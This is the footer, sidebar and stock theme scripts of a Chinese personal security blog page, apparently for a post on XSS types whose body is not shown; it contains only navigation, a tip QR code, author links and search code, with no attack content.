        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/we.jpg" alt="Sn1per 微信支付"/>
        
      </div>
    

    

    

  </div>
</div>

      </div>
    

    

    <div>
      
      <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag"><i class="fa fa-tag"></i> 漏洞</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/24/AWVS%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="next" title="AWVS学习笔记">
                <i class="fa fa-chevron-left"></i> AWVS学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/10/hello-world/" rel="prev" title="Hello World">
                Hello World <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/gogogo.png"
                alt="Sn1per" />
            
              <p class="site-author-name" itemprop="name">Sn1per</p>
              <p class="site-description motion-element" itemprop="description">我手举一枝花，等你带我去流浪</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-globe"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:sn1per@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-globe"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/CHT0402" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-globe"></i>Twitter</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.jianshu.com/u/0d111735f8a0" target="_blank" title="简书">
                      
                        <i class="fa fa-fw fa-globe"></i>简书</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="tencent://message/?uin=31461408" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-globe"></i>QQ</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.weibo.com/5387156994/profile?rightmod=1&wvr=6&mod=personinfo" target="_blank" title="微博">
                      
                        <i class="fa fa-fw fa-globe"></i>微博</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                推荐阅读
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://twosecurity.io/" title="二向箔安全" target="_blank">二向箔安全</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.myh0st.cn/" title="信安之路" target="_blank">信安之路</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://paper.seebug.org/" title="Paper安全技术精粹" target="_blank">Paper安全技术精粹</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.freebuf.com/" title="FreeBuf" target="_blank">FreeBuf</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xz.aliyun.com/" title="先知社区" target="_blank">先知社区</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.anquanke.com/" title="安全客" target="_blank">安全客</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#为什么会有XSS漏洞？"><span class="nav-number">1.</span> <span class="nav-text">为什么会有XSS漏洞？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#同源策略"><span class="nav-number">1.1.</span> <span class="nav-text">同源策略</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS介绍"><span class="nav-number">2.</span> <span class="nav-text">XSS介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS的分类"><span class="nav-number">3.</span> <span class="nav-text">XSS的分类</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#反射型XSS"><span class="nav-number">3.1.</span> <span class="nav-text">反射型XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#存储型XSS"><span class="nav-number">3.2.</span> <span class="nav-text">存储型XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于DOM的XSS"><span class="nav-number">3.3.</span> <span class="nav-text">基于DOM的XSS</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型-存储型-DOM-型区别总结"><span class="nav-number">4.</span> <span class="nav-text">反射型/存储型/ DOM 型区别总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#思维导图"><span class="nav-number">5.</span> <span class="nav-text">思维导图</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#扩展学习"><span class="nav-number">6.</span> <span class="nav-text">扩展学习</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
    <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=428095913&auto=1&height=66"></iframe>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sn1per</span>

  
</div>


  <div class="powered-by">
    <i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
    本站访客数:<span id="busuanzi_value_site_pv"></span>
    </span>
  </div>

  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>-->



  <span class="post-meta-divider">|</span>



  <!--<div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>-->





        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/src/fireworks.js"></script>
  

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
